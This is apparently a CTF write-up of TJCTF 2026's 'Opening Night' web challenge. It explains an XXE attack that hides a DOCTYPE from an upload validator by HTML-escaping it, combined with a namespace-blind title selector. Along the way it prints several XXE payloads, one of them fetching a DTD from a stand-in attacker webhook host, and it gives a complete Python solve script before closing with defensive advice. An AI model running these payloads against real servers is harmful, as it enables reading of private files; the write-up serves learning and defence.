TJCTF 2026: Opening Night
Challenge Overview
The challenge presents a web gallery where users can upload SVG artwork. Each uploaded file is processed server-side: the SVG gets validated by a gatekeeper, and then metadata (title, description, dimensions) is extracted by a label writer and displayed on the gallery page. The key observation is that the output renders into three specific HTML sinks:
<h2>some title</h2>
<p>some description</p>
<dd>700 x 160</dd>
The challenge description says "The new gallery opens tonight." Three hints are provided that point toward a two-stage parsing pipeline with a differential vulnerability between the stages. Understanding how each stage interprets the uploaded file is the crux of this challenge. With only 12 total solves, this was one of the harder web challenges in the CTF, requiring a creative combination of two distinct bugs rather than a single straightforward vulnerability.
Two curators inspect each piece: one hangs the painting (carefully), the other writes the label (sloppily).
The gatekeeper only checks that your file looks like an SVG at the top. The label writer takes the first title/desc it sees by name, ignoring true namespace.
Don't look for hidden rooms, change how your art is "wrapped"! Payload must survive two interpretations: harmless text vs. XML.
Reading these hints together, a clear picture emerges:
- Hint 1 tells us there are two processing stages with different strictness levels. The first is careful (validates properly), the second is sloppy (cuts corners).
- Hint 2 reveals two bugs: the gatekeeper only checks the top of the file (not the full content), and the label writer uses a namespace-blind selector that matches
title/descregardless of their XML namespace. - Hint 3 is the breakthrough: the payload must be "wrapped" differently โ harmless text to one stage, active XML to the other. This directly points to an encoding differential.
Reconnaissance
Before attempting any exploit, we need to understand the full attack surface of the gallery application. Let's walk through the normal upload flow and observe how the server processes our input.
Normal Upload Flow
Uploading a minimal, valid SVG file:
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<title>My Artwork</title>
<desc>A beautiful piece</desc>
<rect width="100%" height="100%" fill="#1a1a2e"/>
<text x="350" y="80" text-anchor="middle" fill="white" font-size="24">Hello World</text>
</svg>
The gallery page renders:
<h2>My Artwork</h2>
<p>A beautiful piece</p>
<dd>700 x 160</dd>
So the server extracts <title> โ <h2>, <desc> โ <p>, and dimensions โ <dd>. The SVG image itself is also displayed. This confirms three output sinks we can potentially control.
Validation Behavior
Let's probe what the gatekeeper accepts and rejects. We test several malformed uploads:
| Test | Result | Inference |
|---|---|---|
Plain text file with .svg extension | Rejected | Content-type or structure is validated |
SVG without xmlns | Rejected | Requires proper SVG namespace |
Valid SVG with <script> inside | Rejected | Blacklists dangerous elements |
| SVG with DOCTYPE declaration | Rejected | DOCTYPE is stripped or blocked |
| SVG with extra namespace elements | Accepted | Non-SVG namespaces are allowed |
| SVG with CDATA section | Accepted | CDATA passes through |
| SVG with HTML entities in title | Accepted & decoded | html.unescape() is applied |
The critical findings: DOCTYPE declarations are rejected, but additional XML namespaces are allowed, and HTML entities are decoded. This immediately rules out straightforward XXE and points toward the namespace confusion + encoding differential approach.
The html.unescape() Discovery
One test reveals the second stage's behavior. We upload an SVG containing HTML entities in the title:
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<title>Test & Entity <script></title>
<desc>Testing decode</desc>
</svg>
The rendered output shows:
h2: 'Test & Entity <script>'
The HTML entities & and < have been decoded โ & became & and < became a literal <script> tag. This proves the backend calls html.unescape() on the content before or during parsing. This is our attack vector.
The server runs html.unescape() on the uploaded content before XML parsing. This means if we upload HTML-escaped XML, the gatekeeper sees harmless text, but after unescaping, the XML parser receives fully functional XML โ including DOCTYPE and entity declarations.
Bug 1: Namespace Confusion
Hint 2 tells us the label writer "takes the first title/desc it sees by name, ignoring true namespace." This means the metadata extraction uses a namespace-blind selector โ likely Python's ElementTree.find("title") or an XPath like //*[local-name()="title"].
In XML, namespaces exist precisely to disambiguate elements with the same local name. A proper SVG parser should only match {http://www.w3.org/2000/svg}title, not {urn:not-svg}title. But the label writer doesn't check namespaces, so we can inject a title element in a fake namespace that the label parser will still match.
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<metadata>
<x:title xmlns:x="urn:not-svg">INJECTED_TITLE</x:title>
<x:desc xmlns:x="urn:not-svg">INJECTED_DESC</x:desc>
</metadata>
<title>SAFE_TITLE</title>
<desc>SAFE_DESC</desc>
</svg>
The server renders:
h2: 'INJECTED_TITLE'
p : 'INJECTED_DESC'
Despite <x:title> belonging to the urn:not-svg namespace, the label parser matched it. The SVG validation also accepted it because non-SVG namespaced elements are permitted inside <metadata>. We now have full control over the label content โ but this alone doesn't give us the flag. We need a way to introduce dynamic content expansion (reading a file from the server).
We control the label text, but we can only put static strings there. We need XML entity expansion to dynamically include file contents at parse time. But DOCTYPE declarations are blocked by the gatekeeper... or are they?
Dead Ends
Before arriving at the correct solution, I explored every alternative attack vector. Documenting these failures is important โ they demonstrate why the parser differential approach is the only viable path.
Raw DOCTYPE Doesn't Expand
Since we control the label, the natural next step is XML entity expansion. We try uploading a document with an internal entity declaration:
<!DOCTYPE svg [
<!ENTITY e "ENTITY_OK">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
<x:title xmlns:x="urn:not-svg">&e;</x:title>
</metadata>
</svg>
The output is devastating:
h2: '&e;'
The entity reference &e; is not expanded โ it appears as a literal string. This is devastating and leads many solvers to conclude entity expansion is impossible. But we're just hitting the gatekeeper: the DOCTYPE is being stripped during validation, so the XML parser never sees the entity declaration.
External XXE and XInclude Blocked
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
<x:title xmlns:x="urn:not-svg">&xxe;</x:title>
</metadata>
</svg>
<!DOCTYPE svg [
<!ENTITY % dtd SYSTEM "http://attacker.webhook.site/evil.dtd">
%dtd;
]>
<svg xmlns="http://www.w3.org/2000/svg">
...
</svg>
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xi="http://www.w3.org/2001/XInclude">
<metadata>
<x:title xmlns:x="urn:not-svg">
<xi:include href="file:///flag" parse="text"/>
</x:title>
</metadata>
</svg>
Every external access vector fails:
- External Entity โ File access via external entities is completely disabled.
- OOB Parameter Entities โ No callback was ever received, confirming outbound network access is blocked.
- XInclude โ Not processed by the parser. XInclude support is not enabled.
Not SSTI or Multipart Confusion
- Multipart tricks โ The application consistently uses the real file part and rejects base64-encoded content.
- SSTI โ
{{7*7}},${7*7}printed literally. No template injection. - XSLeak โ No information leakage through error messages or timing.
Every straightforward attack vector fails. The solution requires understanding the two-stage processing pipeline at a deeper level.
Breakthrough: Parser Differential
Returning to Hint 3 โ "Payload must survive two interpretations: harmless text vs. XML" โ we now have all the pieces. The question is: how can the same bytes be harmless text to one parser but valid XML to another?
The breakthrough is HTML-encoding. If we HTML-escape the entire XML document before uploading, the gatekeeper sees only escaped text โ no XML tags, no DOCTYPE, nothing suspicious. But the backend calls html.unescape() before passing the content to the XML parser, reconstructing the original XML with all its entity declarations intact.
Consider what happens when we HTML-escape an XML document:
<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>
<svg xmlns="http://www.w3.org/2000/svg">...</svg>
<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>
<svg xmlns="http://www.w3.org/2000/svg">...</svg>
After HTML-escaping, all < become <, all > become >, all & become &. The gatekeeper inspects this and sees only escaped text โ no XML structure, no DOCTYPE, nothing to validate or reject. The file passes through as harmless content.
Then the backend performs html.unescape(), which reverses every HTML entity back to its original character. The XML parser receives the clean, unescaped document โ complete with DOCTYPE and entity declarations โ and processes it normally.
A parser differential vulnerability occurs when two components process the same input differently due to different parsing rules, encoding assumptions, or processing stages. In this case, the gatekeeper treats the raw bytes as text (seeing no XML structure), while the label writer first unescapes and then parses as XML (seeing a complete document with entities). This semantic gap is the vulnerability.
Why External Entities Work After Unescaping
The earlier failure happened because the gatekeeper was stripping the DOCTYPE before the XML parser ever saw it. The parser received a document without entity declarations, so &flag; was treated as an undefined entity and rendered literally.
Now, with the HTML-escape bypass, the gatekeeper never sees the DOCTYPE because it's hidden behind HTML entities. The html.unescape() step reconstructs the DOCTYPE after validation has already passed. The XML parser then receives the full document with entity declarations and expands them.
The server likely uses lxml.etree with network resolution disabled but local file resolution enabled โ a common misconfiguration that allows file:// URIs in SYSTEM entities while blocking http://.
# Stage 1: Gatekeeper โ validates raw upload
raw = request.files['svg_file'].read()
if has_doctype(raw): # Checks for <!DOCTYPE in raw bytes
reject("DOCTYPE not allowed")
if not is_valid_svg(raw): # Checks for <svg> tag structure
reject("Invalid SVG")
# Stage 2: Label Writer โ unescapes, then parses
decoded = html.unescape(raw.decode()) # < โ <, & โ &, etc.
tree = etree.fromstring(decoded) # Now sees DOCTYPE + entities!
title = tree.find(".//title") # Namespace-blind search
desc = tree.find(".//desc")
Final Exploit
Payload Construction
Because the HTML-unescape step happens before XML parsing, we can now place a DOCTYPE declaration at the very start of the document โ the only position where it's valid in XML. After unescaping, the XML parser sees a proper DTD with entity definitions and expands them accordingly.
The complete payload before HTML-escaping:
<!DOCTYPE svg [
<!ENTITY flag SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<metadata>
<x:title xmlns:x="urn:not-svg">&flag;</x:title>
<x:desc xmlns:x="urn:not-svg">Opening Night Gallery</x:desc>
</metadata>
<title>Safe Title</title>
<desc>Safe Description</desc>
<rect width="100%" height="100%" fill="white"/>
</svg>
Breaking down every component:
<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>โ Declares an external entity namedflagthat reads the file/flag. This is the payload that the gatekeeper would normally reject.<x:title xmlns:x="urn:not-svg">โ Fake-namespacetitleelement. The label parser will match this first due to document order, ignoring that it's not in the SVG namespace.&flag;โ Entity reference that will be expanded to the contents of/flagduring XML parsing.<title>Safe Title</title>โ Legitimate SVG title as a fallback. The label parser won't reach this because it already matched the fake-namespace one.<rect .../>โ Valid SVG content so the image renders normally.
Applying HTML-Escape
Now we HTML-escape the entire document. Every <, >, &, and " gets converted to its HTML entity equivalent:
<!DOCTYPE svg [
<!ENTITY flag SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<metadata>
<x:title xmlns:x="urn:not-svg">&flag;</x:title>
<x:desc xmlns:x="urn:not-svg">Opening Night Gallery</x:desc>
</metadata>
<title>Safe Title</title>
<desc>Safe Description</desc>
<rect width="100%" height="100%" fill="white"/>
</svg>
Pay special attention to &flag; โ this is the HTML-escaped form of &flag;. After html.unescape(), & becomes &, so the XML parser sees &flag;, which it then expands as an entity reference.
Complete Exploit Flow
- HTML-escape the entire XML document โ every
<,>,&, and quote character gets converted to its HTML entity equivalent. - Upload the escaped content as
image/svg+xml. - Gatekeeper inspects the raw bytes โ sees only
<,>,&sequences. No<!DOCTYPEpattern. No<svg>tag. Passes validation as harmless text. - Backend calls
html.unescape()โ all HTML entities are decoded back to their original characters. The full XML document is reconstructed. - XML parser receives the clean document with
<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>and processes the entity declaration. - Entity expansion โ
&flag;resolves to the contents of/flagon the server's filesystem. - Label parser extracts the expanded entity value via namespace-blind
find("title")match and renders it in the<h2>tag. - Flag appears in the gallery page output.
tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}
Exploit Code
#!/usr/bin/env python3
"""
TJCTF 2026 โ Opening Night
Parser Differential via HTML-escape โ unescape โ XML entity expansion
Author: QA210 | 3rd solve / 12 total
"""
import html
import re
import sys
import requests
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"
FLAG_PAT = re.compile(r"tjctf\{[^}]+\}", re.IGNORECASE)
def craft_svg_payload():
"""
Build the raw XML with DOCTYPE + external entity, then HTML-escape it.
The raw XML contains:
- DOCTYPE with SYSTEM entity pointing to /flag
- Fake-namespace title/desc that the label parser matches
- Entity reference &flag; in the fake-namespace title
After html.escape(), the gatekeeper sees only escaped text.
After html.unescape() on the backend, the XML parser sees the full
document and expands &flag; to the file contents.
"""
raw_xml = (
'<!DOCTYPE svg [\n'
' <!ENTITY flag SYSTEM "file:///flag">\n'
']>\n'
'<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">\n'
' <metadata>\n'
' <x:title xmlns:x="urn:not-svg">&flag;</x:title>\n'
' <x:desc xmlns:x="urn:not-svg">QA210 Gallery</x:desc>\n'
' </metadata>\n'
' <title>Safe</title>\n'
' <desc>Safe</desc>\n'
' <rect width="100%" height="100%" fill="white"/>\n'
'</svg>\n'
)
# The critical step: HTML-escape the entire document once.
# Gatekeeper sees escaped text; backend unescapes before XML parse.
return html.escape(raw_xml, quote=True).encode("utf-8")
def find_upload_endpoint(session):
"""Discover the upload form action and file field name."""
r = session.get(f"{TARGET}/")
action_m = re.search(r'action="([^"]*)"', r.text)
field_m = re.search(r'name="([^"]*)".*type="file"', r.text)
if not action_m or not field_m:
return f"{TARGET}/upload", "file"
return f"{TARGET}{action_m.group(1)}", field_m.group(1)
def main():
session = requests.Session()
action_url, field_name = find_upload_endpoint(session)
payload = craft_svg_payload()
print(f"[*] Target: {TARGET}")
print(f"[*] Action: {action_url}")
print(f"[*] Field: {field_name}")
print(f"[*] Payload: {len(payload)} bytes (HTML-escaped XML)")
resp = session.post(
action_url,
files={field_name: ("opening.svg", payload, "image/svg+xml")},
allow_redirects=True,
timeout=30,
)
match = FLAG_PAT.search(resp.text)
if match:
print(f"[+] FLAG: {match.group(0)}")
else:
print("[-] Flag not found in response.")
for line in resp.text.splitlines():
if "title" in line.lower() or "flag" in line.lower():
print(f" {line.strip()}")
if __name__ == "__main__":
main()
Running the Exploit
$ python3 solve.py https://opening-night.tjctf.org
[*] Target: https://opening-night.tjctf.org
[*] Action: https://opening-night.tjctf.org/upload
[*] Field: svg_file
[*] Payload: 587 bytes (HTML-escaped XML)
[+] FLAG: tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}
Key Takeaways
This challenge demonstrates a classic parser differential attack. When two components process the same data using different rules, the gap between their interpretations becomes an attack surface. Security decisions made by one parser can be completely undermined by transformations applied before the second parser.
HTML entity encoding is a representation, not a security boundary. Applying html.unescape() before parsing effectively nullifies any validation that was performed on the escaped form. The lesson: always validate the decoded form of input, not the encoded form.
Using namespace-blind XML selectors like find("title") instead of find("{http://www.w3.org/2000/svg}title") allows attackers to inject elements in fake namespaces that the parser still matches. Always use fully-qualified names when processing XML from untrusted sources.
1. Validate after decoding โ Never validate encoded input and then decode before use. Decode first, then validate the decoded form.
2. Use namespace-aware parsers โ Always match elements by their fully-qualified name including namespace URI.
3. Disable entity resolution โ Configure XML parsers with resolve_entities=False and no_network=True. For defense-in-depth, also strip DOCTYPE declarations server-side.
4. Use allowlists, not denylists โ Instead of blocking specific dangerous patterns (DOCTYPE, script tags), only allow known-safe structures.